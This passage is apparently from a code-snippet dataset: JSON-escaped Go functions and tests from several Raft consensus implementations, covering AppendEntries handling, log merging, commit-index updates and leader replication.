{\n\t\tfmt.Println(s.syncedPeer)\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t\ts.syncedPeer[resp.peer] = true\n\t\tfmt.Println(resp.peer, \"->\", s.syncedPeer[resp.peer])\n\t}\n\n\t// Increment the commit count to make sure we have a quorum before committing.\n\tif len(s.syncedPeer) < s.QuorumSize() {\n\t\treturn\n\t}\n\n\t// Determine the committed index that a majority has.\n\tvar indices []uint64\n\tindices = append(indices, s.log.currentIndex())\n\tfor _, peer := range s.peers {\n\t\tindices = append(indices, peer.getPrevLogIndex())\n\t}\n\tsort.Sort(sort.Reverse(uint64Slice(indices)))\n\n\t// We can commit up to the index which the majority of the members have appended.\n\tcommitIndex := indices[s.QuorumSize()-1]\n\tcommittedIndex := s.log.commitIndex\n\n\tif commitIndex > committedIndex {\n\t\t// leader needs to do a fsync before committing log entries\n\t\ts.log.sync()\n\t\ts.log.setCommitIndex(commitIndex)\n\t\ts.debugln(\"commit index \", commitIndex)\n\t}\n}", "func (rf *Raft) updateNextIndexWhenAppendEntriesFail(server int, reply *AppendEntriesReply) {\n\t//lastTryIndex := rf.nextIndex[server]\n\tif reply.SuggestPrevLogIndex < rf.snapshotIndex {\n\t\t// suggestPrevLogIndex+1 is the one that should be the first entry in AppendEntries\n\t\t// If suggestPrevLogIndex+1 <= rf.snapshotIndex, then we cannot find the entry\n\n\t\t// the next time will send snapshotIndex\n\t\t// including index==0 && term==0 when rf.snapshotIndex>0 ?\n\t\trf.nextIndex[server] = rf.snapshotIndex\n\t} else if rf.getTermForIndex(reply.SuggestPrevLogIndex) == reply.SuggestPrevLogTerm {\n\t\t// including index==0 && term==0 when rf.snapshotIndex==0 ?\n\t\trf.nextIndex[server] = reply.SuggestPrevLogIndex + 1\n\t} else if rf.getTermForIndex(reply.SuggestPrevLogIndex) > reply.SuggestPrevLogTerm {\n\t\tnpi := reply.SuggestPrevLogIndex\n\t\tfor ; npi >= rf.snapshotIndex+1 && rf.getTermForIndex(npi) > reply.SuggestPrevLogTerm; npi-- {\n\t\t}\n\t\trf.nextIndex[server] = npi + 1\n\t} else {\n\t\tAssertF(reply.SuggestPrevLogIndex >= rf.snapshotIndex+1,\n\t\t\t\"reply.SuggestPrevLogIndex {%d} >= rf.snapshotIndex+1 {%d}\",\n\t\t\treply.SuggestPrevLogIndex, rf.snapshotIndex+1)\n\t\trf.nextIndex[server] = reply.SuggestPrevLogIndex\n\t}\n\n\tRaftDebug(\"SendAppendEntries failed to %d ++: rf.nextIndex[%d]=%d\",\n\t\trf, server, server, rf.nextIndex[server])\n\n\tAssertF(rf.nextIndex[server] >= rf.snapshotIndex && rf.nextIndex[server] <= rf.getLastIndex()+1, \"\")\n\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (rf *Raft) sendAppendEntries(server int, args *AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\treturn ok\n}", "func (rf *Raft) sendAppendEntries(peerIdx int) {\n\tRPCTimer := time.NewTimer(RPCTimeout)\n\tdefer RPCTimer.Stop()\n\n\tfor !rf.killed() {\n\t\trf.mu.Lock()\n\t\tif rf.role != Leader { // 不是 Leader, 直接结束\n\t\t\trf.resetHeartBeatTimer(peerIdx)\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t}\n\t\targs := rf.getAppendEntriesArgs(peerIdx)\n\t\trf.resetHeartBeatTimer(peerIdx)\n\t\trf.mu.Unlock()\n\n\t\tRPCTimer.Stop()\n\t\tRPCTimer.Reset(RPCTimeout)\n\t\treply := AppendEntriesReply{} // RPC 返回reply\n\t\tresCh := make(chan bool, 1) // call result\n\t\tgo func(args *AppendEntriesArgs, reply *AppendEntriesReply) {\n\t\t\tok := rf.peers[peerIdx].Call(\"Raft.AppendEntries\", args, reply)\n\t\t\tif !ok {\n\t\t\t\ttime.Sleep(time.Millisecond * 10)\n\t\t\t}\n\t\t\tresCh <- ok\n\t\t}(&args, &reply)\n\n\t\tselect {\n\t\tcase <-RPCTimer.C: // RPC 超时\n\t\t\tcontinue\n\t\tcase ok := <-resCh:\n\t\t\tif !ok { // RPC 失败\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t\t// call ok, check reply\n\t\trf.mu.Lock()\n\t\tif rf.currentTerm != args.Term { // 不是 Leader, 或者 Term 不匹配\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.Term > rf.currentTerm { // Election Restriction: 有更加新的 Term, 直接拒绝\n\t\t\trf.changeRole(Follower)\n\t\t\trf.resetElectionTimer()\n\t\t\trf.currentTerm = reply.Term\n\t\t\trf.persist()\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.Success { // reply 成功\n\t\t\tif reply.NextIndex > rf.nextIndex[peerIdx] {\n\t\t\t\trf.nextIndex[peerIdx] = reply.NextIndex\n\t\t\t\trf.matchIndex[peerIdx] = reply.NextIndex - 1\n\t\t\t}\n\t\t\tif len(args.Entries) > 0 && args.Entries[len(args.Entries)-1].Term == rf.currentTerm {\n\t\t\t\t// 只 commit 自己 term 的 index\n\t\t\t\trf.updateCommitIndex()\n\t\t\t}\n\t\t\trf.persist()\n\t\t\trf.mu.Unlock()\n\t\t\treturn\n\t\t} else if reply.NextIndex != 0 { // reply 失败\n\t\t\tif reply.NextIndex > rf.lastSnapshotIndex {\n\t\t\t\t// need retry\n\t\t\t\trf.nextIndex[peerIdx] = reply.NextIndex\n\t\t\t\trf.mu.Unlock()\n\t\t\t\tcontinue\n\t\t\t} else {\n\t\t\t\t// send snapshot rpc\n\t\t\t\tgo rf.sendInstallSnapshot(peerIdx)\n\t\t\t\trf.mu.Unlock()\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// 乱序\n\t\t\trf.mu.Unlock()\n\t\t}\n\t}\n}", "func updateLastAppended(s *followerReplication, req *pb.AppendEntriesRequest) {\n\t// Mark any inflight logs as committed\n\tif logs := req.Entries; len(logs) > 0 {\n\t\tlast := logs[len(logs)-1]\n\t\tatomic.StoreUint64(&s.nextIndex, last.Index+1)\n\t\ts.commitment.match(s.peer.ID, last.Index)\n\t}\n\n\t// Notify still leader\n\ts.notifyAll(true)\n}", "func (rf *Raft) sendAppendEntries(server int, args AppendEntriesArgs, reply *AppendEntriesReply) bool {\n\tDPrintf(\"Serv[%d], SendAppendEntries to %d\\n\", rf.me, server)\n\tok := rf.peers[server].Call(\"Raft.AppendEntries\", args, reply)\n\tDPrintf(\"Serv[%d], SendAppendEntries rsp from %d\\n\", rf.me, server)\n\treturn ok\n}", "func TestLeaderCommitEntry(t *testing.T) {\n\ts := NewMemoryStorage()\n\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, s)\n\tdefer closeAndFreeRaft(r)\n\tr.becomeCandidate()\n\tr.becomeLeader()\n\tcommitNoopEntry(r, s)\n\tli := r.raftLog.lastIndex()\n\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgProp, Entries: []pb.Entry{{Data: []byte(\"some data\")}}})\n\n\tfor _, m := range r.readMessages() {\n\t\tr.Step(acceptAndReply(m))\n\t}\n\n\tif g := r.raftLog.committed; g != li+1 {\n\t\tt.Errorf(\"committed = %d, want %d\", g, li+1)\n\t}\n\twents := []pb.Entry{{Index: li + 1, Term: 1, Data: []byte(\"some data\")}}\n\tif g := r.raftLog.nextEnts(); !reflect.DeepEqual(g, wents) {\n\t\tt.Errorf(\"nextEnts = %+v, want %+v\", g, wents)\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\tfor i, m := range msgs {\n\t\tif w := uint64(i + 2); m.To != w {\n\t\t\tt.Errorf(\"to = %x, want %x\", m.To, w)\n\t\t}\n\t\tif m.Type != pb.MsgApp {\n\t\t\tt.Errorf(\"type = %v, want %v\", m.Type, pb.MsgApp)\n\t\t}\n\t\tif m.Commit != li+1 {\n\t\t\tt.Errorf(\"commit = %d, want %d\", m.Commit, li+1)\n\t\t}\n\t}\n}", "func (l *RaftLog) appendEntries(prevTerm uint64, prevIndex uint64, commitIndex uint64, ents []pb.Entry) bool {\n\tif prevIndex > l.LastIndex() {\n\t\treturn false\n\t}\n\tt, err := l.Term(prevIndex)\n\tif err != nil {\n\t\treturn false\n\t}\n\tif t != prevTerm {\n\t\treturn false\n\t}\n\tif len(ents) <= 0 {\n\t\tif commitIndex > l.committed {\n\t\t\tcanCommit := mathutil.MinUint64Val(commitIndex, prevIndex+uint64(len(ents)))\n\t\t\tl.committed = mathutil.MaxUint64(l.committed, canCommit)\n\t\t}\n\t\treturn true\n\t}\n\tchangeEnts := findMergeEntries(l.entries, ents)\n\tl.pendingEntries = mergeEntries(l.pendingEntries, changeEnts)\n\tl.entries = mergeEntries(l.entries, changeEnts)\n\tif commitIndex > l.committed {\n\t\tcanCommit := mathutil.MinUint64Val(commitIndex, prevIndex+uint64(len(ents)))\n\t\tl.committed = mathutil.MaxUint64(l.committed, canCommit)\n\t}\n\treturn true\n}", "func TestFollowerCheckMsgApp(t *testing.T) {\n\tents := []pb.Entry{{Term: 1, Index: 1}, {Term: 2, Index: 2}}\n\ttests := []struct {\n\t\tterm uint64\n\t\tindex uint64\n\t\twindex uint64\n\t\twreject bool\n\t\twrejectHint uint64\n\t}{\n\t\t// match with committed entries\n\t\t{0, 0, 1, false, 0},\n\t\t{ents[0].Term, ents[0].Index, 1, false, 0},\n\t\t// match with uncommitted entries\n\t\t{ents[1].Term, ents[1].Index, 2, false, 0},\n\n\t\t// unmatch with existing entry\n\t\t{ents[0].Term, ents[1].Index, ents[1].Index, true, 2},\n\t\t// unexisting entry\n\t\t{ents[1].Term + 1, ents[1].Index + 1, ents[1].Index + 1, true, 2},\n\t}\n\tfor i, tt := range tests {\n\t\tstorage := NewMemoryStorage()\n\t\tstorage.Append(ents)\n\t\tr := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, storage)\n\t\tdefer closeAndFreeRaft(r)\n\t\tr.loadState(pb.HardState{Commit: 1})\n\t\tr.becomeFollower(2, 2)\n\n\t\tr.Step(pb.Message{From: 2, FromGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTo: 1, ToGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tType: pb.MsgApp, Term: 2, LogTerm: tt.term, Index: tt.index})\n\n\t\tmsgs := r.readMessages()\n\t\twmsgs := []pb.Message{\n\t\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\t\tType: pb.MsgAppResp, Term: 2, Index: tt.windex, Reject: tt.wreject, RejectHint: tt.wrejectHint},\n\t\t}\n\t\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\t\tt.Errorf(\"#%d: msgs = %+v, want %+v\", i, msgs, wmsgs)\n\t\t}\n\t}\n}", "func (m *Member) AppendEntry(leader string, term uint64, value int64, prevLogID int64) (bool, error) {\n\tlog.Infoln(\"Requesting log entry of\", m.Name, \"Value\", value)\n\tvar conn *grpc.ClientConn\n\tconn, err := grpc.Dial(m.Address(), grpc.WithInsecure())\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\tdefer conn.Close()\n\tapi := raftapi.NewRaftServiceClient(conn)\n\tctx := context.Background()\n\tresponse, err := api.AppendEntry(ctx, &raftapi.AppendEntryRequest{\n\t\tTerm: term,\n\t\tLeader: leader,\n\t\tPrevLogId: prevLogID,\n\t\tPrevLogTerm: term,\n\t\tEntry: &raftapi.LogEntry{\n\t\t\tTerm: term,\n\t\t\tValue: value,\n\t\t},\n\t})\n\tif err != nil {\n\t\treturn false, NewRaftError(m, err)\n\t}\n\n\treturn response.Success, nil\n}", "func (handler *RuleHandler) FollowerOnAppendEntriesReply(msg iface.MsgAppendEntriesReply, log iface.RaftLog, status iface.Status) []interface{} {\n\t// delayed append entries reply. ignore it\n\treturn []interface{}{}\n}", "func (r *RaftNode) mergeLogEntries(req *AppendEntriesRequest) (success bool) {\n\n\tr.leaderMutex.Lock()\n\tdefer r.leaderMutex.Unlock()\n\n\tentries := req.GetEntries()\n\n\t// if prevLogIndex is out of range, cannot merge\n\tif req.GetPrevLogIndex() < 0 || req.GetPrevLogIndex() > r.getLastLogIndex() {\n\t\tr.Out(\"MERGING: Couldn't find prev\")\n\t\treturn false\n\t}\n\n\t// if log doesn't contain entry at prevLogIndex with term PrevLogTerm, cannot merge\n\tfollowerPrevLog := r.getLogEntry(req.GetPrevLogIndex())\n\tif followerPrevLog.TermId != req.GetPrevLogTerm() {\n\t\tr.Out(\"MERGING: Couldn't find prevEntry with term = %d; index = %d\", req.GetPrevLogTerm(), req.GetPrevLogIndex())\n\t\treturn false\n\t}\n\n\t// if there are entries present, merge them\n\tif entries != nil && len(entries) != 0 {\n\t\tfor i := range entries {\n\t\t\t// index of where we would insert the new item\n\t\t\tinsertAt := uint64(i) + req.GetPrevLogIndex() + 1\n\t\t\tif entries[i].GetIndex() != insertAt {\n\t\t\t\tr.Error(\"Request doesn't have correct index!! State corrupted.\")\n\t\t\t}\n\t\t\tr.Out(\"Merging logs: adding %v\", entries[i])\n\t\t\tif insertAt <= r.getLastLogIndex() {\n\t\t\t\tr.truncateLog(insertAt)\n\t\t\t\tr.appendLogEntry(*entries[i])\n\t\t\t} else {\n\t\t\t\t// if we go past the end of the log (or remove entries above), keep appending\n\t\t\t\tr.appendLogEntry(*entries[i])\n\t\t\t}\n\t\t}\n\t}\n\n\t// apply all logEntries up until leader's commitIndex to statemachine\n\tif req.GetLeaderCommit() > r.commitIndex {\n\t\tnewCommitIndex := min(req.GetLeaderCommit(), r.getLastLogIndex())\n\t\t// start at +1 since commitIndex has already been committed\n\t\tfor i := r.commitIndex + 1; i <= newCommitIndex; i++ {\n\t\t\tentry := r.getLogEntry(i)\n\t\t\tr.Out(\"COMMITTING index=%v;term=%v\", entry.GetIndex(), entry.GetTermId())\n\t\t\tif entry.Type == CommandType_STATE_MACHINE_COMMAND {\n\t\t\t\tresponse, err := r.stateMachine.ApplyCommand(entry.Command, entry.Data)\n\t\t\t\tif err != nil {\n\t\t\t\t\tr.Error(\"State machine error: %v (response: %s)\", err, response)\n\t\t\t\t}\n\t\t\t}\n\t\t\tr.lastApplied = i\n\t\t}\n\t\tr.commitIndex = newCommitIndex\n\t}\n\n\tr.Verbose(\"Merge successful\")\n\treturn true\n}", "func TestAppendFew(t *testing.T) {\n const basePath = \"../../../_test/durable/tx_few\"\n os.RemoveAll(basePath)\n nt := setup()\n\n tl := CreateTransactionLogger(basePath)\n numTestEntries := 198\n\n tl.assertValid()\n\n for i := 0; i < numTestEntries; i++ {\n tx := &testTx{int64(i), nt()}\n tl.Append(tx)\n tl.assertValid()\n }\n\n expectNFilesAtPath(t, 2, basePath)\n expectNFilePairs(t, 1, tl)\n expectNTransactions(t, int64(numTestEntries), tl)\n tl.Close()\n}", "func (s *server) AppendEntries(req *AppendEntriesRequest) *AppendEntriesResponse {\n\tvar ret, _ = s.send(req)\n\tresp, _ := ret.(*AppendEntriesResponse)\n\treturn resp\n}", "func (s ReplicaServer) AppendEntry(ctx context.Context, req *proto.AppendEntryReq) (*proto.AppendEntryResp, error) {\n\ts.R.mu.Lock()\n\tdefer s.R.mu.Unlock()\n\n\tif req.Term >= s.R.term {\n\t\ts.R.term = req.Term\n\t\ts.R.lastPinged = time.Now()\n\t\ts.R.setLeader(req.Id)\n\t\ts.R.lastCommit = req.LastCommit\n\t\ts.R.execute()\n\n\t\t// Check if preceding entry exists first, unless first entry\n\t\tif req.PreIndex == -1 || (req.PreIndex < int64(len(s.R.log)) && s.R.log[req.PreIndex].Term == req.PreTerm) {\n\t\t\t// Append entries to log\n\t\t\tentries := req.Entries\n\n\t\t\tif len(entries) == 0 {\n\t\t\t\t// Replica up to date\n\t\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t\t}\n\n\t\t\tsort.Slice(entries, func(i, j int) bool { return entries[i].Index < entries[j].Index })\n\n\t\t\tnumNeed := entries[len(entries)-1].Index + 1 - int64(len(s.R.log))\n\t\t\tif numNeed > 0 {\n\t\t\t\ts.R.log = append(s.R.log, make([]*proto.Entry, numNeed)...)\n\t\t\t}\n\t\t\tfor _, e := range entries {\n\t\t\t\ts.R.log[e.Index] = e\n\t\t\t}\n\n\t\t\treturn &proto.AppendEntryResp{Ok: true}, nil\n\t\t}\n\t}\n\treturn &proto.AppendEntryResp{Ok: false}, nil\n}", "func (s *RaftServer) AppendEntry(_ context.Context, request *raftapi.AppendEntryRequest) (*raftapi.AppendEntryResponse, error) {\n\tlog.WithFields(s.LogFields()).Debugln(\"Received AppendEntry from\", request.Leader)\n\ts.lastHeartbeat = time.Now()\n\tterm := s.getTerm()\n\tif request.Term < term {\n\t\tlog.WithFields(s.LogFields()).Warnln(\"Term\", request.Term, \"Less than my term\", term)\n\t\treturn &raftapi.AppendEntryResponse{Term: term}, nil\n\t} else if request.Term >= term {\n\t\ts.role = Follower\n\t\tif err := s.setTerm(request.Term); err != nil {\n\t\t\tlog.WithFields(s.LogFields()).Errorln(\"Unable to update my term\")\n\t\t\treturn nil, model.NewRaftError(&s.member, err)\n\t\t}\n\t}\n\ts.leaderID = request.Leader\n\tsize, _ := s.logRepo.LogSize()\n\tread, _ := s.logRepo.Read(request.PrevLogId)\n\tif request.PrevLogId == -1 || uint64(request.PrevLogId) <= size && read.Term == request.PrevLogTerm {\n\t\tif size > 0 {\n\t\t\t_ = s.logRepo.TruncateToEntryNo(request.PrevLogId)\n\t\t}\n\t\tif request.Entry != nil {\n\t\t\t_, _ = s.logRepo.Create(request.Entry.Term, request.Entry.Value)\n\t\t}\n\t\treturn &raftapi.AppendEntryResponse{Term: term, Success: true}, nil\n\t}\n\treturn &raftapi.AppendEntryResponse{Term: term}, nil\n}", "func (r *Raft) processAppendEntries(done <-chan struct{}) <-chan struct{} {\n\tfinishChannel := make(chan struct{})\n\n\tgo func() {\n\tprocessLoop:\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase appendEntryToProcess, ok := <-r.appendEntriesProcessChannel:\n\t\t\t\tif !ok {\n\t\t\t\t\tr.logger.Debugf(\"channel for processing AppendEntries events was closed.\")\n\t\t\t\t\tbreak processLoop\n\t\t\t\t}\n\n\t\t\t\trequest := appendEntryToProcess.Request\n\t\t\t\tresponseChannel := appendEntryToProcess.ResponseChannel\n\n\t\t\t\tlogger := loggerFromContext(r.logger, appendEntryToProcess.Context)\n\t\t\t\tlogger = logger.WithFields(logrus.Fields{\"RPC\": \"AppendEntries\", \"Sender\": request.GetLeaderId()})\n\n\t\t\t\tlogger.Debugf(\"received RPC: %+v\", request)\n\n\t\t\t\tr.stateMutex.Lock()\n\n\t\t\t\tsenderTerm := request.GetTerm()\n\t\t\t\treceiverTerm := r.stateManager.GetCurrentTerm()\n\t\t\t\tentries := request.GetEntries()\n\t\t\t\tpreviousLogIndex := request.GetPrevLogIndex()\n\t\t\t\tpreviousLogTerm := request.GetPrevLogTerm()\n\t\t\t\tleaderID := request.GetLeaderId()\n\t\t\t\tleaderCommit := request.GetLeaderCommit()\n\t\t\t\trequestedNewLogIndex := previousLogIndex + uint64(len(entries))\n\n\t\t\t\tresponseFunc := func(sentByLeader bool, entriesAppended bool) {\n\t\t\t\t\tr.appendEntriesHandlersChannel <- appendEntriesEvent{\n\t\t\t\t\t\tbyLeader: sentByLeader,\n\t\t\t\t\t}\n\n\t\t\t\t\tresponseChannel <- appendEntriesProcessResponse{\n\t\t\t\t\t\tResponse: &pb.AppendEntriesResponse{\n\t\t\t\t\t\t\tTerm: receiverTerm,\n\t\t\t\t\t\t\tSuccess: entriesAppended,\n\t\t\t\t\t\t},\n\t\t\t\t\t\tError: nil,\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif senderTerm > receiverTerm {\n\t\t\t\t\t// The sender node has higher term than the receiver node, so we switch to FOLLOWER\n\t\t\t\t\tlogger.Debugf(\"switching state to follower. sender's term: %d, receiver's term: %d\", senderTerm, receiverTerm)\n\t\t\t\t\tr.stateManager.SwitchPersistentState(senderTerm, nil, FOLLOWER)\n\t\t\t\t} else if senderTerm < receiverTerm {\n\t\t\t\t\t// The candidate has lower term than the node, so deny the request\n\t\t\t\t\tlogger.Debugf(\"sending reject response. sender's term: %d, receiver's term: %d\", senderTerm, receiverTerm)\n\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\tresponseFunc(false, false)\n\t\t\t\t\tcontinue\n\t\t\t\t} else if r.stateManager.GetRole() == CANDIDATE {\n\t\t\t\t\tlogger.Debugf(\"switching state to follower because received request with an equal term from a leader\")\n\t\t\t\t\tr.stateManager.SwitchPersistentState(senderTerm, nil, FOLLOWER)\n\t\t\t\t}\n\n\t\t\t\t// Set the leader\n\t\t\t\terr := r.cluster.SetLeader(leaderID)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlogger.Panicf(\"unable to set leader %s: %+v\", leaderID, err)\n\t\t\t\t}\n\n\t\t\t\t// We check if the index is correct\n\t\t\t\t// index == startingLogIndex - 1 signifies we received first log\n\t\t\t\tif previousLogIndex < startingLogIndex-1 {\n\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\tlogger.Panicf(\"received request with a previous index %d lower than the lower limit for log indexes\",\n\t\t\t\t\t\tpreviousLogIndex)\n\t\t\t\t} else if previousLogIndex >= startingLogIndex {\n\t\t\t\t\t// If log does not contain an term-matching entry at previousLogIndex\n\t\t\t\t\t// reply false\n\t\t\t\t\tterm, err := r.logManager.FindTermAtIndex(previousLogIndex)\n\t\t\t\t\tif err == persister.ErrIndexedLogDoesNotExists {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Debugf(\"unable to find log with index: %+v\", previousLogIndex)\n\t\t\t\t\t\tresponseFunc(true, false)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t} else if err != nil {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"failed when finding log by index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t}\n\n\t\t\t\t\tif term != previousLogTerm {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Debugf(\"terms not equal (local: %d, remote: %d) at index: %d\", term, previousLogTerm, previousLogIndex)\n\t\t\t\t\t\tresponseFunc(true, false)\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t}\n\n\t\t\t\t\t// If an existing entry conflicts with a new one, i.e. same index\n\t\t\t\t\t// but different terms, delete the existing entry and all that follow it\n\t\t\t\t\t// Otherwise, append only new entries\n\t\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\t\tfirstNewLogIndex := previousLogIndex + 1\n\t\t\t\t\t\tfirstNewLogTerm, err := r.logManager.FindTermAtIndex(firstNewLogIndex)\n\t\t\t\t\t\tif err != nil && err != persister.ErrIndexedLogDoesNotExists {\n\t\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\t\tlogger.Panicf(\"failed when finding log by index %d: %+v\", firstNewLogIndex, err)\n\t\t\t\t\t\t} else if err == nil {\n\t\t\t\t\t\t\tif entries[0].GetTerm() != firstNewLogTerm {\n\t\t\t\t\t\t\t\terr := r.logManager.DeleteLogsAferIndex(firstNewLogIndex)\n\t\t\t\t\t\t\t\tif err != nil {\n\t\t\t\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\t\t\t\tlogger.Panicf(\"unable to delete log after index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t} else {\n\t\t\t\t\t\t\t\t// We presuppose that any logs after the first new log are equal\n\t\t\t\t\t\t\t\tlastLogIndex := r.logManager.GetLastLogIndex()\n\t\t\t\t\t\t\t\tnOfLogToAppend := requestedNewLogIndex - lastLogIndex\n\t\t\t\t\t\t\t\tif requestedNewLogIndex < lastLogIndex {\n\t\t\t\t\t\t\t\t\tnOfLogToAppend = 0\n\t\t\t\t\t\t\t\t}\n\n\t\t\t\t\t\t\t\tindexToAppendFrom := uint64(len(entries)) - nOfLogToAppend\n\t\t\t\t\t\t\t\tentries = entries[indexToAppendFrom:]\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t} else if len(entries) != 0 {\n\t\t\t\t\t// This is the case when we received first log to append\n\t\t\t\t\t// Therefore we need to delete all logs\n\t\t\t\t\terr := r.logManager.DeleteLogsAferIndex(startingLogIndex)\n\t\t\t\t\tif err != nil && err != persister.ErrDatabaseEmpty {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"unable to delete log after index %d: %+v\", previousLogIndex, err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif len(entries) != 0 {\n\t\t\t\t\tlogger.Debugf(\"appending entries: %+v\", entries)\n\t\t\t\t\terr := r.logManager.AppendEntries(entries)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\tr.stateMutex.Unlock()\n\t\t\t\t\t\tlogger.Panicf(\"unable to append logs: %+v\", err)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\t// Specs say: If leaderCommit > commitIndex, set commitIndex =\n\t\t\t\t// min(leaderCommit, index of last new entry).\n\t\t\t\t// Because we do not keep track of last applied, therefore\n\t\t\t\t// we set to leaderCommit if localCommitIndex < leaderCommit < indexOfLastNewEntry\n\t\t\t\t// we set to indexOfLastNewEntry if localCommitIndex < indexOfLastNewEntry < leaderCommit\n\t\t\t\t// we leave localCommitIndex if indexOfLastNewEntry < localCommitIndex < leaderCommit\n\t\t\t\tlocalCommitIndex := r.stateManager.GetCommitIndex()\n\t\t\t\tif leaderCommit > localCommitIndex {\n\t\t\t\t\tlogger.Debugf(\"deciding whether to commit: localCommit: %d, newIndex: %d, leaderCommit: %d\", localCommitIndex, requestedNewLogIndex, leaderCommit)\n\n\t\t\t\t\tnewCommitIndex := localCommitIndex\n\t\t\t\t\tif localCommitIndex <= requestedNewLogIndex && requestedNewLogIndex <= leaderCommit {\n\t\t\t\t\t\tnewCommitIndex = requestedNewLogIndex\n\t\t\t\t\t} else if localCommitIndex <= leaderCommit && leaderCommit <= requestedNewLogIndex {\n\t\t\t\t\t\tnewCommitIndex = leaderCommit\n\t\t\t\t\t}\n\n\t\t\t\t\tr.commitLogsToStateMachine(appendEntryToProcess.Context, localCommitIndex, newCommitIndex)\n\t\t\t\t\tr.stateManager.SetCommitIndex(newCommitIndex)\n\t\t\t\t}\n\n\t\t\t\tr.stateMutex.Unlock()\n\n\t\t\t\tlogger.Debugf(\"sending accept response\")\n\n\t\t\t\tresponseFunc(true, true)\n\t\t\tcase <-done:\n\t\t\t\tbreak processLoop\n\t\t\t}\n\t\t}\n\n\t\tclose(finishChannel)\n\t}()\n\n\treturn finishChannel\n}", "func (r *Raft) LogRepair(response AppendEntriesResponse) {\n\tId := response.FollowerId\n\tfailedIndex := r.f_specific[Id].nextIndex\n\tvar nextIndex int\n\tif failedIndex != 0 {\n\t\tif response.LastLogIndex < r.MyMetaData.LastLogIndex { //==CHECK\n\t\t\tnextIndex = response.LastLogIndex + 1\n\t\t} else {\n\t\t\tnextIndex = failedIndex - 1 //decrementing follower's nextIndex\n\t\t\t//nextIndex = response.LastLogIndex + 1 //changed on 12 march--failing for some cases --CHECK, doesn't work with for loop in handleClient\n\t\t}\n\t} else { //if nextIndex is 0 means, follower doesn't have first entry (of leader's log),so decrementing should not be done, so retry the same entry again!\n\t\tnextIndex = failedIndex\n\t}\n\tr.f_specific[Id].nextIndex = nextIndex\n\treturn\n}", "func (r *Raft) sendAppendEntriesRPC() {\n\tappEntriesObj := r.prepAppendEntriesReq() //prepare AppendEntries object\n\tappEntriesObjSlice := make([]interface{}, len(appEntriesObj))\n\n\t//Copy to new slice created--This is the method to send a []interface to []TypeX\n\tfor i, d := range appEntriesObj {\n\t\tappEntriesObjSlice[i] = d\n\t}\n\tr.sendToAll_AppendReq(appEntriesObjSlice) //send AppendEntries to all the followers\n}", "func (r *RaftNode) handleAppendEntries(msg AppendEntriesMsg) (resetTimeout, fallback bool) {\n\tif len(msg.request.GetEntries()) > 0 {\n\t\tr.Debug(\"Got appendEntries with %d entries from %v\", len(msg.request.GetEntries()), msg.request.GetLeader())\n\t} else {\n\t\tr.Verbose(\"Got appendEntries heartbeat from %v\", msg.request.GetLeader().Id)\n\t}\n\n\t// resetTimeout == request successful\n\tif msg.request.GetTerm() < r.GetCurrentTerm() {\n\t\t// if the leader calling us is behind the times the request is unsuccessful, and it should revert\n\t\tmsg.reply <- AppendEntriesReply{r.GetCurrentTerm(), false} // our term is greater the leader's\n\t\treturn false, false\n\n\t} else {\n\t\t// node has higher or equivalent term and so this is an acceptable heartbeat\n\t\t// make sure we have this leader as our leader and the correct term\n\t\tr.updateTermIfNecessary(msg.request.GetTerm())\n\n\t\t// no matter our state, we'll always be reverting to a follower when getting an AppendEntries,\n\t\t// so set our leader to be the cluster leader (who will also be the one who sent the message)\n\t\tr.Leader = msg.request.GetLeader()\n\n\t\tsuccess := r.mergeLogEntries(msg.request)\n\t\tmsg.reply <- AppendEntriesReply{r.GetCurrentTerm(), success}\n\n\t\t// always \"fall back\", but this will only be utilized by leaders and candidates\n\t\treturn true, true\n\t}\n}", "func (r *Raft) 